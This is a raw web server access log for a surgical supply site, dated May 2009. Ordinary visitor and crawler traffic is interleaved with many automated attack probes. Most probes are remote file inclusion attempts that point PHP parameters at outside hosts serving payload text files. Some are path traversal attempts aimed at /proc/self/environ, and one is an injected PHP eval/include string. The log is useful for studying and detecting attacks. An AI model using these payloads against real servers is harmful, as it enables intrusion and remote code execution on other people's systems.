99.26.146.188 - - [20/May/2009:00:00:01 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; ezPeer+ v1.5 (0.5.2.08); GTB6; .NET CLR 1.1.4322; InfoPath.1)"
99.26.146.188 - - [20/May/2009:00:00:01 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; ezPeer+ v1.5 (0.5.2.08); GTB6; .NET CLR 1.1.4322; InfoPath.1)"
99.26.146.188 - - [20/May/2009:00:00:04 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; ezPeer+ v1.5 (0.5.2.08); GTB6; .NET CLR 1.1.4322; InfoPath.1)"
99.26.146.188 - - [20/May/2009:00:00:04 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; ezPeer+ v1.5 (0.5.2.08); GTB6; .NET CLR 1.1.4322; InfoPath.1)"
89.111.189.11 - - [20/May/2009:00:00:12 -0400] "GET /logs/access_log.Q109050900/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
91.121.210.42 - - [20/May/2009:00:00:47 -0400] "GET /logs/access_log.Q108110900/index_table.php?root_dir=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
124.0.73.2 - - [20/May/2009:00:01:23 -0400] "GET /logs/access_log.Q109020700%20%20//joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
124.0.73.2 - - [20/May/2009:00:01:23 -0400] "GET /logs//joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
124.0.73.2 - - [20/May/2009:00:01:24 -0400] "GET //joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
88.84.128.40 - - [20/May/2009:00:01:29 -0400] "GET /logs/access_log.Q109041200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.803"
88.84.128.40 - - [20/May/2009:00:01:29 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.803"
88.84.128.40 - - [20/May/2009:00:01:30 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.803"
124.0.73.2 - - [20/May/2009:00:01:35 -0400] "GET /logs/access_log.Q108122500%20%20//joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
200.32.100.130 - - [20/May/2009:00:02:10 -0400] "GET /logs/access_log.Q108090200//s_loadenv.inc.php?DOCUMENT_ROOT=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
88.191.103.144 - - [20/May/2009:00:02:28 -0400] "GET /logs//orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
88.191.103.144 - - [20/May/2009:00:02:28 -0400] "GET /logs/access_log.Q109020100//orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
88.191.103.144 - - [20/May/2009:00:02:28 -0400] "GET //orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
220.181.7.97 - - [20/May/2009:00:02:30 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
122.111.60.144 - - [20/May/2009:00:02:39 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
122.111.60.144 - - [20/May/2009:00:02:39 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
89.111.189.11 - - [20/May/2009:00:02:42 -0400] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
122.111.60.144 - - [20/May/2009:00:02:42 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
122.111.60.144 - - [20/May/2009:00:02:42 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
89.111.189.11 - - [20/May/2009:00:02:44 -0400] "GET /logs/access_log.Q109050900/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
89.111.189.11 - - [20/May/2009:00:02:47 -0400] "GET /logs/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
72.52.230.168 - - [20/May/2009:00:02:58 -0400] "GET //orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
72.52.230.168 - - [20/May/2009:00:02:58 -0400] "GET /logs/access_log.Q109020100//orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
72.52.230.168 - - [20/May/2009:00:02:58 -0400] "GET /logs//orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
69.248.128.84 - - [20/May/2009:00:03:11 -0400] "GET /logs/access_log.Q109041200/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 264 "-" "libwww-perl/5.79"
69.248.128.84 - - [20/May/2009:00:03:12 -0400] "GET /ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
69.248.128.84 - - [20/May/2009:00:03:19 -0400] "GET /logs/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
123.125.64.38 - - [20/May/2009:00:03:42 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
65.23.154.225 - - [20/May/2009:00:03:58 -0400] "GET /logs/access_log.Q108110900/modules/agendax/addevent.inc.php?agendax_path=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 257 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
65.23.154.225 - - [20/May/2009:00:03:59 -0400] "GET /modules/agendax/addevent.inc.php?agendax_path=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 230 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
65.23.154.225 - - [20/May/2009:00:03:59 -0400] "GET /logs/access_log.Q108110900/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
65.23.154.225 - - [20/May/2009:00:03:59 -0400] "GET /errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
65.23.154.225 - - [20/May/2009:00:03:59 -0400] "GET /logs/access_log.Q108110900/modules/agendax/addevent.inc.php?agendax_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 257 "-" "XXXXXX"
65.23.154.225 - - [20/May/2009:00:03:59 -0400] "GET /modules/agendax/addevent.inc.php?agendax_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 230 "-" "XXXXXX"
65.23.154.225 - - [20/May/2009:00:03:59 -0400] "GET /logs/access_log.Q108110900/modules/agendax/addevent.inc.php?agendax_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 257 "-" "XXXXXX"
65.23.154.225 - - [20/May/2009:00:03:59 -0400] "GET /modules/agendax/addevent.inc.php?agendax_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 230 "-" "XXXXXX"
65.23.154.225 - - [20/May/2009:00:04:01 -0400] "GET /logs/modules/agendax/addevent.inc.php?agendax_path=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
65.23.154.225 - - [20/May/2009:00:04:01 -0400] "GET /logs/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
65.23.154.225 - - [20/May/2009:00:04:01 -0400] "GET /logs/modules/agendax/addevent.inc.php?agendax_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 235 "-" "XXXXXX"
65.23.154.225 - - [20/May/2009:00:04:01 -0400] "GET /logs/modules/agendax/addevent.inc.php?agendax_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "XXXXXX"
72.52.230.168 - - [20/May/2009:00:04:16 -0400] "GET /logs/access_log.Q109020100%20%20//orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
209.59.12.99 - - [20/May/2009:00:04:41 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.52.230.168 - - [20/May/2009:00:04:47 -0400] "GET /logs/access_log.Q109011400%20%20//orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
76.204.227.66 - - [20/May/2009:00:04:50 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
76.204.227.66 - - [20/May/2009:00:04:50 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
76.204.227.66 - - [20/May/2009:00:04:54 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
76.204.227.66 - - [20/May/2009:00:04:54 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
88.191.103.144 - - [20/May/2009:00:05:24 -0400] "GET /logs/access_log.Q109020100%20%20//orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
65.23.154.225 - - [20/May/2009:00:05:28 -0400] "GET /logs/access_log.Q108120600/modules/agendax/addevent.inc.php?agendax_path=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 257 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
65.23.154.225 - - [20/May/2009:00:05:28 -0400] "GET /logs/access_log.Q108120600/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
65.23.154.225 - - [20/May/2009:00:05:28 -0400] "GET /logs/access_log.Q108120600/modules/agendax/addevent.inc.php?agendax_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 257 "-" "XXXXXX"
65.23.154.225 - - [20/May/2009:00:05:28 -0400] "GET /logs/access_log.Q108120600/modules/agendax/addevent.inc.php?agendax_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 257 "-" "XXXXXX"
66.187.99.209 - - [20/May/2009:00:05:48 -0400] "GET //orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
66.187.99.209 - - [20/May/2009:00:05:48 -0400] "GET /logs//orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
66.187.99.209 - - [20/May/2009:00:05:48 -0400] "GET /logs/access_log.Q109020100//orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
66.187.99.209 - - [20/May/2009:00:05:50 -0400] "GET /logs/access_log.Q109020100//orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
66.187.99.209 - - [20/May/2009:00:05:50 -0400] "GET //orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
66.187.99.209 - - [20/May/2009:00:05:50 -0400] "GET /logs//orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
66.187.99.209 - - [20/May/2009:00:05:51 -0400] "GET /logs//orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
66.187.99.209 - - [20/May/2009:00:05:51 -0400] "GET /logs/access_log.Q109020100//orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
66.187.99.209 - - [20/May/2009:00:05:51 -0400] "GET //orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
66.187.99.209 - - [20/May/2009:00:06:04 -0400] "GET /logs/access_log.Q109020100%20%20//orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
66.187.99.209 - - [20/May/2009:00:06:05 -0400] "GET /logs/access_log.Q109020100%20%20//orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
66.187.99.209 - - [20/May/2009:00:06:06 -0400] "GET /logs/access_log.Q109020100%20%20//orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
209.175.180.194 - - [20/May/2009:00:06:07 -0400] "GET /logs/access_log.Q109050700//skin/zero_vote/ask_password.php?dir=http://www.wizard.com.br/fx29id.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
66.249.72.114 - - [20/May/2009:00:06:50 -0400] "GET /images/index11_sagittal.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
66.187.99.209 - - [20/May/2009:00:06:57 -0400] "GET /logs/access_log.Q109011400%20%20//orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
66.187.99.209 - - [20/May/2009:00:06:59 -0400] "GET /logs/access_log.Q109011400%20%20//orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
66.187.99.209 - - [20/May/2009:00:07:01 -0400] "GET /logs/access_log.Q109011400%20%20//orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
88.191.103.144 - - [20/May/2009:00:07:05 -0400] "GET /logs/access_log.Q109011400%20%20//orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
209.200.8.89 - - [20/May/2009:00:07:46 -0400] "GET /logs///vwar/backup/errors.php?error=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
209.200.8.89 - - [20/May/2009:00:07:46 -0400] "GET ///vwar/backup/errors.php?error=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
209.200.8.89 - - [20/May/2009:00:07:50 -0400] "GET /logs/access_log.Q108091400%20%20///vwar/backup/errors.php?error=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
209.200.8.89 - - [20/May/2009:00:08:12 -0400] "GET /logs///vwar/backup/errors.php?error=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
209.200.8.89 - - [20/May/2009:00:08:12 -0400] "GET /logs/access_log.Q108091400%20%20///vwar/backup/errors.php?error=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
209.200.8.89 - - [20/May/2009:00:08:12 -0400] "GET ///vwar/backup/errors.php?error=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
148.243.72.112 - - [20/May/2009:00:08:12 -0400] "GET /logs/access_log.Q108091400//oneadmin/calendar/samplecalendar.php?path[docroot]=http://shakur.sanjosedelmar.com/fx29id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
148.243.72.112 - - [20/May/2009:00:08:29 -0400] "GET /logs/access_log.Q109051000//oneadmin/calendar/samplecalendar.php?path[docroot]=http://shakur.sanjosedelmar.com/fx29id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
209.200.8.89 - - [20/May/2009:00:08:47 -0400] "GET /logs/access_log.Q108111500%20%20///vwar/backup/errors.php?error=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
66.249.72.114 - - [20/May/2009:00:09:03 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L108004491C21E7007E0D04E+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
200.93.147.154 - - [20/May/2009:00:09:08 -0400] "GET /logs/access_log.Q108052200/?sourcedir=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
209.200.8.89 - - [20/May/2009:00:09:09 -0400] "GET /logs/access_log.Q108111500%20%20///vwar/backup/errors.php?error=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
209.59.12.99 - - [20/May/2009:00:09:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
210.240.12.4 - - [20/May/2009:00:10:08 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.monkeyinktattoos.com//modules/xcgal/albums/userpics/10001/black/fx29id.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
210.240.12.4 - - [20/May/2009:00:10:08 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://www.monkeyinktattoos.com//modules/xcgal/albums/userpics/10001/black/fx29id.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
210.240.12.4 - - [20/May/2009:00:10:08 -0400] "GET /logs/access_log.Q109050900%20%20//skin/zero_vote/ask_password.php?dir=http://www.monkeyinktattoos.com//modules/xcgal/albums/userpics/10001/black/fx29id.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
66.187.99.209 - - [20/May/2009:00:11:47 -0400] "GET /logs/access_log.Q109011400//orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
66.187.99.209 - - [20/May/2009:00:11:47 -0400] "GET /logs/access_log.Q109050700//orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
88.191.103.144 - - [20/May/2009:00:12:18 -0400] "GET /logs/access_log.Q109011400//orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
88.191.103.144 - - [20/May/2009:00:12:18 -0400] "GET /logs/access_log.Q109050700//orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
66.187.99.209 - - [20/May/2009:00:12:20 -0400] "GET /logs/access_log.Q109011400//orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
210.240.12.4 - - [20/May/2009:00:12:20 -0400] "GET /logs/access_log.Q108090400%20%20//skin/zero_vote/ask_password.php?dir=http://www.monkeyinktattoos.com//modules/xcgal/albums/userpics/10001/black/fx29id.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
66.187.99.209 - - [20/May/2009:00:12:20 -0400] "GET /logs/access_log.Q109050700//orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
66.187.99.209 - - [20/May/2009:00:12:22 -0400] "GET /logs/access_log.Q109011400//orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
66.187.99.209 - - [20/May/2009:00:12:22 -0400] "GET /logs/access_log.Q109050700//orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
83.137.192.223 - - [20/May/2009:00:12:37 -0400] "GET /logs/access_log.Q109042600%20%20//skin/zero_vote/error.php?dir=http://www.rakkasanwarriors.com/id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
217.199.222.19 - - [20/May/2009:00:12:50 -0400] "GET /logs/errors.php?error=http://cameraexchange.com.au/id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
217.199.222.19 - - [20/May/2009:00:12:51 -0400] "GET /logs/access_log.Q108081600/errors.php?error=http://cameraexchange.com.au/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.199.222.19 - - [20/May/2009:00:12:51 -0400] "GET /errors.php?error=http://cameraexchange.com.au/id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.199.222.19 - - [20/May/2009:00:13:00 -0400] "GET /logs/access_log.Q109030500/errors.php?error=http://cameraexchange.com.au/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.248.128.84 - - [20/May/2009:00:13:44 -0400] "GET /logs/error_log.Q108100400//s_loadenv.inc.php?DOCUMENT_ROOT=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
68.5.151.194 - - [20/May/2009:00:14:07 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
68.5.151.194 - - [20/May/2009:00:14:07 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
68.5.151.194 - - [20/May/2009:00:14:08 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
68.5.151.194 - - [20/May/2009:00:14:08 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
75.56.214.231 - - [20/May/2009:00:14:17 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
75.56.214.231 - - [20/May/2009:00:14:17 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
82.110.102.244 - - [20/May/2009:00:14:19 -0400] "GET /logs/error_log.Q108122800/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.sangabuay.com/p/info.txt??? HTTP/1.1" 404 288 "-" "libwww-perl/5.813"
82.110.102.244 - - [20/May/2009:00:14:19 -0400] "GET /administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.sangabuay.com/p/info.txt??? HTTP/1.1" 404 262 "-" "libwww-perl/5.813"
